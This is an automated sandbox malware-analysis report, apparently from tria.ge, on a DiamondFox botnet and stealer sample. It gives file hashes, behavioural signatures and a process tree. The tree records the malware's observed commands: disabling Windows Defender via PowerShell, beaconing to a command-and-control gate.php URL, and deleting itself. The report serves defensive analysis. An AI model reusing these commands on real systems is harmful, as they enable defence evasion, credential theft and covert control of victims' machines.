Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

SecuriteIn...29.exe

windows7_x64

10

SecuriteIn...29.exe

windows10_x64

10

Analysis

  • max time kernel
    122s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    04/07/2021, 02:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe

  • Size

    203KB

  • MD5

    a1e165e1926c0c83123c89fce6b1af56

  • SHA1

    281246ba4b852a5f62e032424f7816f5a6b0406f

  • SHA256

    2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

  • SHA512

    28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Score
10/10
diamondfoxbotnetdiscoveryspywarestealer

Malware Config

Signatures

  • DiamondFox

    DiamondFox is a multipurpose botnet with many capabilities.

    botnetstealerdiamondfox
  • DiamondFox payload 13 IoCs

    Detects DiamondFox payload in file/memory.

  • NirSoft MailPassView 3 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 3 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 9 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 10 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 4 IoCs
    evasion
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1268
    • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
      "C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1500
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1720
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1676
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic" os get caption /FORMAT:List
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1252
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic" path win32_VideoController get caption /FORMAT:List
        3⤵
          PID:1284
        • C:\Windows\SysWOW64\Wbem\wmic.exe
          "wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
          3⤵
            PID:620
          • C:\Windows\SysWOW64\Wbem\wmic.exe
            "wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
            3⤵
              PID:1372
            • C:\Windows\SysWOW64\Wbem\wmic.exe
              "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
              3⤵
                PID:1004
              • C:\Windows\SysWOW64\Wbem\wmic.exe
                "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
                3⤵
                  PID:1284
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  /scomma "C:\Users\Admin\AppData\Local\Temp\1.log"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1028
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  /scomma "C:\Users\Admin\AppData\Local\Temp\4.log"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:588
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  /scomma "C:\Users\Admin\AppData\Local\Temp\2.log"
                  3⤵
                  • Executes dropped EXE
                  PID:1040
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  /scomma "C:\Users\Admin\AppData\Local\Temp\3.log"
                  3⤵
                  • Executes dropped EXE
                  PID:692
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
                  3⤵
                  • Executes dropped EXE
                  PID:1268
                  • C:\Windows\notepad.exe
                    X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                    4⤵
                    • Opens file in notepad (likely ransom note)
                    PID:1792
                  • C:\Windows\write.exe
                    X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                    4⤵
                      PID:608
                  • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:396
                  • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:1372
                  • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
                    3⤵
                    • Executes dropped EXE
                    PID:1256
                  • C:\Windows\SysWOW64\Wbem\wmic.exe
                    "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
                    3⤵
                      PID:1556
                    • C:\Windows\SysWOW64\Wbem\wmic.exe
                      "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
                      3⤵
                        PID:1428
                      • C:\Windows\SysWOW64\taskkill.exe
                        "taskkill" /PID 1268 /F
                        3⤵
                        • Kills process with taskkill
                        PID:1968
                      • C:\Windows\SysWOW64\taskkill.exe
                        "taskkill" /PID 396 /F
                        3⤵
                        • Kills process with taskkill
                        PID:1676
                      • C:\Windows\SysWOW64\taskkill.exe
                        "taskkill" /PID 1372 /F
                        3⤵
                        • Kills process with taskkill
                        PID:1684
                      • C:\Windows\SysWOW64\taskkill.exe
                        "taskkill" /PID 1256 /F
                        3⤵
                        • Kills process with taskkill
                        PID:912
                      • C:\Windows\SysWOW64\Wbem\wmic.exe
                        "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
                        3⤵
                          PID:2116
                        • C:\Windows\SysWOW64\Wbem\wmic.exe
                          "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
                          3⤵
                            PID:2192
                          • C:\Users\Admin\AppData\Local\Temp\localmgr.exe
                            "C:\Users\Admin\AppData\Local\Temp\localmgr.exe"
                            3⤵
                            • Executes dropped EXE
                            PID:2244
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe' -Force -Recurse
                          2⤵
                          • Deletes itself
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1532

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • memory/396-168-0x0000000000400000-0x0000000000405000-memory.dmp

                        Filesize

                        20KB

                        Download

                      • memory/396-160-0x0000000000400000-0x0000000000405000-memory.dmp

                        Filesize

                        20KB

                        Download

                      • memory/588-140-0x0000000000400000-0x0000000000405000-memory.dmp

                        Filesize

                        20KB

                        Download

                      • memory/588-145-0x0000000000400000-0x0000000000405000-memory.dmp

                        Filesize

                        20KB

                        Download

                      • memory/692-152-0x0000000000400000-0x0000000000455000-memory.dmp

                        Filesize

                        340KB

                        Download

                      • memory/692-156-0x0000000000400000-0x0000000000455000-memory.dmp

                        Filesize

                        340KB

                        Download

                      • memory/1028-135-0x0000000000400000-0x000000000047C000-memory.dmp

                        Filesize

                        496KB

                        Download

                      • memory/1028-139-0x0000000000400000-0x000000000047C000-memory.dmp

                        Filesize

                        496KB

                        Download

                      • memory/1040-146-0x0000000000400000-0x0000000000422000-memory.dmp

                        Filesize

                        136KB

                        Download

                      • memory/1040-151-0x0000000000400000-0x0000000000422000-memory.dmp

                        Filesize

                        136KB

                        Download

                      • memory/1256-174-0x0000000000400000-0x0000000000431000-memory.dmp

                        Filesize

                        196KB

                        Download

                      • memory/1256-180-0x0000000000400000-0x0000000000431000-memory.dmp

                        Filesize

                        196KB

                        Download

                      • memory/1268-167-0x0000000000400000-0x0000000000413000-memory.dmp

                        Filesize

                        76KB

                        Download

                      • memory/1268-157-0x0000000000400000-0x0000000000413000-memory.dmp

                        Filesize

                        76KB

                        Download

                      • memory/1268-59-0x0000000075591000-0x0000000075593000-memory.dmp

                        Filesize

                        8KB

                        Download

                      • memory/1372-179-0x0000000000400000-0x0000000000406000-memory.dmp

                        Filesize

                        24KB

                        Download

                      • memory/1372-169-0x0000000000400000-0x0000000000406000-memory.dmp

                        Filesize

                        24KB

                        Download

                      • memory/1532-72-0x0000000004BD0000-0x0000000004BD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1532-79-0x0000000004B90000-0x0000000004B91000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1532-134-0x0000000005620000-0x0000000005621000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1532-150-0x0000000006130000-0x0000000006131000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1532-80-0x0000000004B92000-0x0000000004B93000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1720-78-0x0000000004830000-0x0000000004831000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1720-113-0x00000000055D0000-0x00000000055D1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1720-81-0x0000000004832000-0x0000000004833000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1720-98-0x0000000005670000-0x0000000005671000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1720-99-0x00000000060E0000-0x00000000060E1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1720-106-0x0000000006280000-0x0000000006281000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1720-93-0x0000000005610000-0x0000000005611000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1720-83-0x0000000004650000-0x0000000004651000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1720-122-0x000000007EF30000-0x000000007EF31000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1720-87-0x0000000005240000-0x0000000005241000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1720-70-0x0000000000F40000-0x0000000000F41000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1720-130-0x0000000006310000-0x0000000006311000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1720-129-0x0000000006300000-0x0000000006301000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/2244-192-0x0000000004D70000-0x0000000004D71000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/2244-193-0x0000000004D75000-0x0000000004D86000-memory.dmp

                        Filesize

                        68KB

                        Download